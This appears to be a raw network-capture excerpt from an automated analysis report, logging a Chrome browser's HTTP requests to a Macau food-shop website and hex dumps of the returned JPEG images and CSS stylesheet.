21 bc 59 f9 d6 79 6d 2f 82 cd 23 08 71 4f bc ea 38 c3 d4 c4 e2 1b c5 9f 9d 67 96 d2 f8 2c d2 30 87 14 fb ce a3 8c 3d 4c 4e 21 bc 59 f9 d6 79 6d 2f 82 cd 23 08 71 4f bc ea 38 c3 d4 c4 e2 1b c5 9f 9d 67 96 d2 f8 2c d2 30 87 14 fb ce a3 8c 3d 4c 4e 21 bc 59 f9 d6 79 6d 2f 82 cd 23 08 71 4f bc ea 38 c3 d4 c4 e2 1b c5 9f 9d 67 96 d2 f8 2c d2 30 87 14 fb ce a3 8c 3d 4c 4e 21 bc 59 f9 d6 79 6d 2f 82 cd 23 08 71 4f bc ea 38 c3 d4 c4 e2 1b c5 9f 9d 67 96 d2 f8 2c d2 30 87 14 fb ce a3 8c 3d 4c 4e 21 bc 59 f9 d6 79 6d 2f 82 cd 23 08 71 4f bc ea 38 c3 d4 c4 e2 1b c5 9f 9d 67 96 d2 f8 2c d2 30 87 14 fb ce a3 8c 3d 4c 4e 21 bc 59 f9 d6 79 6d 2f 82 cd 23 08 71 4f bc ea 38 c3 d4 c4 e2 1b c5 9f 9d 67 96 d2 f8 2c d2 30 87 14 fb ce a3 8c 3d 4c 4e 21 bc 59 f9 d6 79 6d 2f 82 cd 23 08 71 4f bc ea 38 c3 d4 c4 e2 1b c5 9f 9d 67 96 d2 f8 2c d2 30 87 14 fb ce a3 8c 3d 4c 4e 21 bc 59 f9 d6 79 6d 2f 82 cd 23 08 71 4f bc ea 38 c3 d4 c4 e2 1b c5 9f 9d 67 96 d2 f8 2c d2 30 87 14 fb ce a3 8c 3d 4c 4e 21 bc 59 f9 d6 79 6d 2f 82 cd 23 08 71 4f bc ea 38 c3 d4 c4 e2 1b c5 9f 9d 67 96 d2 f8 2c d2 30 87 14 fb ce a3 8c 3d 4c 4e 21 bc 59 f9 d6 79 6d 2f 82 cd 23 08 71 4f bc ea 38 c5 8d 43 3c c1 a4 c7 59 75 49 8d a7 46 6a dc b2 24 cf 28 99 7f ca f7 bd 12 fb 3c b6 97 c1 66 91 84 64 54 4c 3b 17 ea 63 0b 4b de e6 55 ad 48 48 94 ba fc 79 92 9c b7 0e 33 6a 05 42 39 7f 95 8e 7a 2b bf 44 b6 4f 2c a6 1f fa 59 a4 61 1b ba 6c d6 ed cd f5 38 c4 a1 33 33 ef 4b d2 4b 6e f8 b2 59 91 7f 4c 4a e4 fe 16 c7 97 52 f8 4c d2 30 88 f8 a7 5e 75 18 db bb b2 cf d5 78 f5 da 6d 30 d5 13 4f a2 d4 b1 8d 81
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed(!1RTUAQ"aq2b#Br$!Q1RAaSq"2#cB3C?ilX\DZ)\.3r\KoCg*1k!-9-%\)+^Zvb+')-<fWqN=LN!Yym/#qO8g,0=LN!Yym/#qO8g,0=LN!Yym/#qO8g,0=LN!Yym/#qO8g,0=LN!Yym/#qO8g,0=LN!Yym/#qO8g,0=LN!Yym/#qO8g,0=LN!Yym/#qO8g,0=LN!Yym/#qO8g,0=LN!Yym/#qO8C<YuIFj$(<fdTL;cKUHHy3jB9z+DO,Yal833KKnYLJRL0^uxm0O
                                                                                                                                                              Mar 13, 2023 05:27:22.541904926 CET3479OUTGET /SysImages/first.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/OurProducts.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:22.746298075 CET3528INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 575
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:23:36 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "e41de41ca8b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:28 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 0b 00 0e 03 01 11 00 02 11 01 03 11 01 ff c4 00 79 00 00 03 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 08 09 01 00 02 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 04 05 06 10 00 00 03 07 03 03 05 00 00 00 00 00 00 00 00 00 02 03 04 01 11 12 13 05 15 06 21 14 07 00 51 32 22 42 23 33 08 11 00 01 02 04 04 05 05 00 00 00 00 00 00 00 00 00 01 11 02 00 21 12 03 31 41 71 04 51 81 c1 52 13 f1 32 62 14 05 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 d3 ac 8f 30 5d 8c e5 9c 37 89 53 f8 b1 b9 05 2b 38 45 50 3a af 94 84 94 8d 08 cf a7 d1 95 2e 26 98 98 46 9a 50 42 ad 41 84 30 4c 12 91 16 5c 0c 14 2d 1b 66 0c 8c 9e f7 7d 7a de e0 31 b5 21 2e 9a f0 04 80 27 8c b3 41 d1 57 2e 96 bd ad 0d 50 56 7c b0 d7 5f 44 05 fc b7 5e 07 e7 ea 27 30 83 8a d1 03 31 37 29 1d 34 de 34 62 53 58 78 82 ca fa 8a 35 b4 4c 97 39 aa a5 05 81 7c bf bd 91 49 77 c5 d2 2d fe 9d f3 b5 75 d9 d5 da a7 bc 35 35 49 6b 96 50 af b0 ef 0f 92 99 ae 1c d1 35 eb 94 52 b4 8b ad a6 97 2e f5 2f 68 44 b9 56 b9 6e 96 17 41 33 d6 ee d1 6b df 5e ad af 51 5b 96 9c 4f 7c 4c 81 6d d7 73 48 8a f5 16 ec 52 e3 b5 bd fb 63 bc 21 d1 ee 7f 96 8e 7f b9 dd 0c a1 1d ed c3 e7 c4 41 1f ff d9
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobedy!Q2"B#3!1AqQR2b?0]7S+8EP:.&FPBA0L\-f}z1!.'AW.PV|_D^'017)44bSXx5L9|Iw-u55IkP5R./hDVnA3k^Q[O|LmsHRc!A
                                                                                                                                                              Mar 13, 2023 05:27:28.782808065 CET4313OUTGET /images/title_products.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:29.003993034 CET4384INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 2247
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:27 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "c03cc7f9a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:34 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 16 00 5f 03 01 11 00 02 11 01 03 11 01 ff c4 00 91 00 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 00 03 04 05 06 07 08 09 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 10 00 01 04 01 03 03 03 02 06 03 00 00 00 00 00 00 01 02 03 04 05 06 00 11 12 21 13 07 31 22 14 32 23 41 51 42 33 15 16 24 17 27 11 00 02 01 03 02 04 04 01 0b 05 00 00 00 00 00 00 01 02 11 00 12 03 21 04 31 22 13 05 41 51 91 32 61 f0 71 81 a1 b1 f1 42 52 23 33 06 c1 a2 14 24 15 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 f7 f3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 33 9f 63 5f 55 15 c9 d6 93 a3 d6 c1 64 a1 2e cc 94 ea 19 69 25 c5 86 d0 14 b5 90 90 54 a5 04 8e bd 49 03 51 66 cf 8f 02 17 c8 c1 54 78 92 00 d4 c0 d4 f9 9d 3e 7a 42 40 d4 d3 cd 4b 4b 46 8a 28 d1 45 1a 28 ae 76 f1 ae 17 8c 79 0b 01 ad cb b3 1a b6 32 2c 9b 2d 43 d3 67 de ca 01 c9 51 96 a7 dc e0 dc 37 4e ea 8c 96 00 09 40 68 a7 6e 3f 9e b8 7e c1 da b6 bd d3 60 bb ad d2 0c 99 72 cb 17 3a b2 ea 60 21 e2 81 38 00 b1 11 55 70 e3 5c 89 73 6a 4d 21 e3 5f 21 e4 92 aa fc 31 57 62 f3 56 87 2d 19 0c 5b 5b 79 1c 97 25 d4 52 a9 c4 46 75 0b 4a c2 79 38 10 0a ca 82 b7 f5 f5 eb a6 76 1e f9 b9 7c 5b 1c 6e 43 75 7a a1 98 ea c7 a5 21 48 33 c4 c7 34 cc d2 61 ca c4 20 3e 33 f5 53 db 7f 2a 65 71 58 cb 05 6d 75 5c 99 d4 f9 e4 0c 4e a1 87 d2 f2 10 eb 33 53 1f dc f2 c3 a7 65 f2 78 8e 40 6c 07 e8 3f 8c bb 9f e4 7b b4 5c dd 35 42 c9 b9 4c 2a 0c c1 0f 6f 13 3c 65 b8 f0 1f 94 d2 b6 66 13 11 ee 8a dc 6a 5b b8 6a 0b 48 bd 9b 0e 7d 98 2a 2f c9 81 15 c8 6c 10 4f b4 25 a7 64 49 50 d8 74 24 b8 77 f5 d8 7a 6b ae db 2e 65 c6 06 66 56 7f 12 aa 54 7a 16 73 fd de 95 65 66 35 ae 30 f1 fd 34 4b 4c 53 c6 6b c2 f1 79 50 b3 c8 f7 e6 4d e6 6a cd 63 f0 99 4d 7b 73 de 54 a1 22 c5 6d 34 d4 b4 ad 90 1b 0d 85 b9 b9 e9 b0 db a7 95 f6 5d aa 66 da 6d 4e d3 11 1b 81 92 5b 28 42 82 c0 e6 fb b2 10 17 20 2b cb 68 2d e5 02 2b 3f 12 ca ad a3 9a 78 c7 c7 cf c6 b7 08 fe 43 c9 d0 d7 92 32 5b 44 55 b1 88 f8 ea c2 ce 1a a0 b1 1d f7 2c 27 88 4c f7 53 c5 e3 20 36 c9 05 68 04 96 d7 cb af 44 74 27 ae c7 df 37 40 6e b7 19 2c 18 76 ec eb 00 12 ef 60 9f 75 d6 af 11 f8 5a 75 f6 f1 ab 03 2b 73 13 10 26 95 6b 35 cd e9 57 80 58 65 6d d2 4b a8 cf a7 c7 ac f8 75 6c 48 66 45 74 99 ac ad f8 db bc f4 87 53 25 3e c2 95 90 db 5b 1e a0 1f 4d 2a f7 6d f6 dc ed 9f 73 d3 29 9d 82 c2 06 0d 8d 9c 16 5e 66 66 0e 34 83 ca 9e 62 97 a8 c2 d2 d1 07 ea ac d7 c8 19 3e 5f 9a 78 a2 eb 27 40 a8 8d 87 cd ba 8f 16 25 61 65 f1 62 23 c4 bb 66 3b 72 15 27 bc 5a 2a 5b 8d 75 6b b2 36 49 df b9 b8 d8 e0 f7 be e1
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed_!1"2#AQB3$'!1"AQ2aqBR#3$?EhQ4QF(E3c_Ud.i%TIQfTx>zB@KKF(E(vy2,-CgQ7N@hn?~`r:`!8Up\sjM!_!1WbV-[[y%RFuJy8v|[nCuz!H34a >3S*eqXmu\N3Sex@l?{\5BL*o<efj[jH}*/lO%dIPt$wzk.efVTzsef504KLSkyPMjcM{sT"m4]fmN[(B +h-+?xC2[DU,'LS 6hDt'7@n,v`uZu+s&k5WXemKulHfEtS%>[M*ms)^ff4b>_x'@%aeb#f;r'Z*[uk6I
                                                                                                                                                              Mar 13, 2023 05:27:30.689626932 CET4559OUTGET /uploadfiles/SRL_1_1_3750019.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:30.895020962 CET4563INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 256111
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:24:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "3636843aa8b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:36 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 38 33 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0e 00 00 01 03 00 01 00 00 00 f0 15 00 00 01 01 03 00 01 00 00 00 a0 0e 00 00 02 01 03 00 03 00 00 00 b6 00 00 00 06 01 03 00 01 00 00 00 02 00 00 00 0f 01 02 00 06 00 00 00 bc 00 00 00 10 01 02 00 15 00 00 00 c2 00 00 00 12 01 03 00 01 00 00 00 01 00 00 00 15 01 03 00 01 00 00 00 03 00 00 00 1a 01 05 00 01 00 00 00 d7 00 00 00 1b 01 05 00 01 00 00 00 df 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 1e 00 00 00 e7 00 00 00 32 01 02 00 14 00 00 00 05 01 00 00 69 87 04 00 01 00 00 00 1c 01 00 00 38 03 00 00 08 00 08 00 08 00 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 35 44 20 4d 61 72 6b 20 49 49 00 00 9f 24 00 10 27 00 00 00 9f 24 00 10 27 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 36 3a 32 32 20 31 30 3a 30 38 3a 35 39 00 00 00 00 1e 00 9a 82 05 00 01 00 00 00 8a 02 00 00 9d 82 05 00 01 00 00 00 92 02 00 00 22 88 03 00 01 00 00 00 01 00 00 00 27 88 03 00 01 00 00 00 64 00 00 00 00 90 07 00 04 00 00 00 30 32 32 31 03 90 02 00 14 00 00 00 9a 02 00 00 04 90 02 00 14 00 00 00 ae 02 00 00 01 92 0a 00 01 00 00 00 c2 02 00 00 02 92 05 00 01 00 00 00 ca 02 00 00 04 92 0a 00 01 00 00 00 d2 02 00 00 05 92 05 00 01 00 00 00 da 02 00 00 07 92 03 00 01 00 00 00 05 00 00 00 09 92 03 00 01 00 00 00 10 00 00 00 0a 92 05 00 01 00 00 00 e2 02 00 00 90 92 02 00 03 00 00 00 33 30 00 00 91 92 02 00 03 00 00 00 33 30 00 00 92 92 02 00 03 00 00 00 33 30 00 00 01 a0 03 00 01 00 00 00 ff ff 00 00 02 a0 04 00 01 00 00 00 f4 01 00 00 03 a0 04 00 01 00 00 00 4e 01 00 00 0e a2 05 00 01 00 00 00 ea 02 00 00 0f a2 05 00 01 00 00 00 f2 02 00 00 10 a2 03 00 01 00 00 00 02 00 00 00 01 a4 03 00 01 00 00 00 00 00 00 00 02 a4 03 00 01 00 00 00 01 00 00 00 03 a4 03 00 01 00 00 00 01 00 00 00 06 a4 03 00 01 00 00 00 00 00 00 00 31 a4 02 00 0a 00 00 00 fa 02 00 00 32 a4 05 00 04 00 00 00 04 03 00 00 34 a4 02 00 14 00 00 00 24 03 00 00 00 00 00 00 01 00 00 00 01 00 00 00 04 00 00 00 01 00 00 00 32 30 31 33 3a 31 31 3a 30 38 20 31 33 3a 30 36 3a 33 34 00 32 30 31 33 3a 31 31 3a 30 38 20 31 33 3a 30 36 3a 33 34 00 00 00 00 00 01 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 03 00 00 00 01 00 00 00 64 00 00 00 01 00 00 00 80 b1 55 00 b3 05 00 00 00 21 39 00 be 03 00 00 39 33 30 36 31 31 30 36 37 00 64 00 00 00 01 00 00 00 64 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 46 31 30 30 6d 6d 20 66 2f 32 2e 38 20 4d 61 63 72 6f 00 06 00 03 01 03 00 01 00 00 00 06 00 00 00 1a 01 05 00 01 00 00 00 86 03 00 00 1b 01 05 00 01 00 00 00 8e 03 00 00 28 01 03 00 01 00 00 00 02 00 00 00 01 02 04 00 01 00 00 00 96 03 00 00 02 02 04 00 01 00 00 00 95 34 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 00 00 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48
                                                                                                                                                              Data Ascii: 83ExifII*(12i8CanonCanon EOS 5D Mark II$'$'Adobe Photoshop CS6 (Windows)2020:06:22 10:08:59"'d0221303030N124$2013:11:08 13:06:342013:11:08 13:06:34dU!9930611067ddEF100mm f/2.8 Macro(4HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-H


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              23192.168.2.34970759.188.3.13280C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Mar 13, 2023 05:26:05.824681997 CET613OUTGET /m/static/css/index_smpc.css HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:06.045784950 CET632INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 12274
                                                                                                                                                              Content-Type: text/css
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:20:15 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "e25256a5a7b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:11 GMT
                                                                                                                                                              Data Raw: 62 6f 64 79 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 37 66 37 66 37 3b 0d 0a 7d 0d 0a 0d 0a 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 e8 bd ae e6 92 ad e5 9b be 20 62 61 6e 6e 65 72 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2a 2f 0d 0a 62 6f 64 79 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 34 46 34 46 34 3b 0d 0a 7d 0d 0a 2e 73 77 69 70 65 72 7b 0d 0a 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0d 0a 20 20 68 65 69 67 68 74 3a 39 30 25 3b 0d 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0d 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 0d 0a 7d 0d 0a 2e 73 77 61 70 65 72 2d 69 6d 67 73 7b 0d 0a 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0d 0a 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 31 2c 31 2c 31 2c 31 29 3b 0d 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 6c 65 66 74 3a 30 3b 0d 0a 20 20 74 6f 70 3a 30 3b 0d 0a 20 20 7a 2d 69 6e 64 65 78 3a 30 3b 0d 0a 7d 0d 0a 2e 73 77 61 70 65 72 2d 69 6d 67 2d 73 68 6f 77 7b 0d 0a 20 20 7a 2d 69 6e 64 65 78 3a 39 39 39 3b 0d 0a 7d 0d 0a 2e 73 77 69 70 65 72 2d 69 63 6f 6e 7b 0d 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 74 6f 70 3a 35 30 25 3b 0d 0a 20 20 7a 2d 69 6e 64 65 78 3a 39 39 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 23 63 63 63 3b 0d 0a 20 20 77 69 64 74 68 3a 34 32 70 78 3b 0d 0a 20 20 68 65 69 67 68 74 3a 34 32 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 32 38 70 78 3b 0d 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 32 70 78 3b 0d 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 0d 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 32 32 2c 32 32 2c 32 32 2c 30 2e 36 29 3b 0d 0a 20 20 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0d 0a 7d 0d 0a 2e 73 77 69 70 65 72 2d 6c 65 66 74 7b 0d 0a 20 20 6c 65 66 74 3a 32 30 70 78 3b 0d 0a 20 20 74 65 78 74 2d 69 6e 64 65 6e 74 3a 2d 32 70 78 3b 0d 0a 7d 0d 0a 2e 73 77 69 70 65 72 2d 72 69 67 68 74 7b 0d 0a 20 20 72 69 67 68 74 3a 32 30 70 78 3b 0d 0a 20 20 74 65 78 74 2d 69 6e 64 65 6e 74 3a 32 70 78 3b 0d 0a 7d 0d 0a 2e 73 77 61 70 65 72 2d 69 6d 67 7b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0d 0a 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0d 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 23 66 66 66 3b 0d 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 74 6f 70 3a 30 3b 0d 0a 20 20 6c 65 66 74 3a 30 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 76 65 72 3b 0d 0a 20 20 6f 70 61 63 69 74 79 3a 30 3b 0d 0a 7d 0d 0a 2e 73 77 61 70 65 72 2d 69 6d 67 2d 73 68 6f 77 7b 0d 0a 20 20 6f 70 61 63 69 74 79 3a 31 3b 0d 0a 7d 0d 0a 0d 0a 2e 73 77 61 70 65 72 2d 69 6e 64 65 78 7b 0d 0a 20 20 77 69 64 74 68 3a 31
                                                                                                                                                              Data Ascii: body{ background:#f7f7f7;}/*---------------- banner ---------------*/body{ background:#F4F4F4;}.swiper{ width:100%; height:90%; margin-top:0; position:relative;}.swaper-imgs{ width:100%; height:100%; background:rgba(1,1,1,1); position:absolute; left:0; top:0; z-index:0;}.swaper-img-show{ z-index:999;}.swiper-icon{ position:absolute; top:50%; z-index:99; color:#ccc; width:42px; height:42px; font-size:28px; line-height:42px; border-radius:50%; text-align:center; background:rgba(22,22,22,0.6); cursor:pointer;}.swiper-left{ left:20px; text-indent:-2px;}.swiper-right{ right:20px; text-indent:2px;}.swaper-img{ display:block; width:100%; height:100%; text-align:center; font-size:24px; color:#fff; position:absolute; top:0; left:0; background-position:center; background-size:cover; opacity:0;}.swaper-img-show{ opacity:1;}.swaper-index{ width:1
                                                                                                                                                              Mar 13, 2023 05:26:06.045836926 CET634INData Raw: 30 30 25 3b 0d 0a 20 20 68 65 69 67 68 74 3a 36 70 78 3b 0d 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 36 70 78 3b 0d 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65
                                                                                                                                                              Data Ascii: 00%; height:6px; line-height:6px; text-align:center; position:absolute; bottom:60px; left:0; z-index:9;}.swaper-index .indexs{ display:inline-block; width:40px; height:6px; margin:0 10px; background:rgba
                                                                                                                                                              Mar 13, 2023 05:26:06.248941898 CET651INData Raw: 6f 7a 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 20 61 6c 74 65 72 6e 61 74 65 3b 0d 0a 20 20 2d 6d 6f 7a 2d 61 6e 69 6d 61 74 69 6f 6e 2d 70 6c 61 79 2d 73 74 61 74 65 3a 20 72 75 6e 6e 69 6e 67 3b 0d 0a 20 20 2f 2a 20 53 61
                                                                                                                                                              Data Ascii: oz-animation-direction: alternate; -moz-animation-play-state: running; /* Safari Chrome: */ -webkit-animation-name: myanimate; -webkit-animation-duration: 1.8s; -webkit-animation-timing-function: ease-in-out; -webkit-anim
                                                                                                                                                              Mar 13, 2023 05:26:06.249042988 CET653INData Raw: 65 20 7b 0d 0a 20 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 37 66 37 66 37 3b 0d 0a 20 7d 0d 0a 20 2e 6e 65 77 2d 70 72 6f 64 75 63 74 73 2d 62 6f 78 20 7b 0d 0a 20 09 77 69 64 74 68 3a 20 31 30
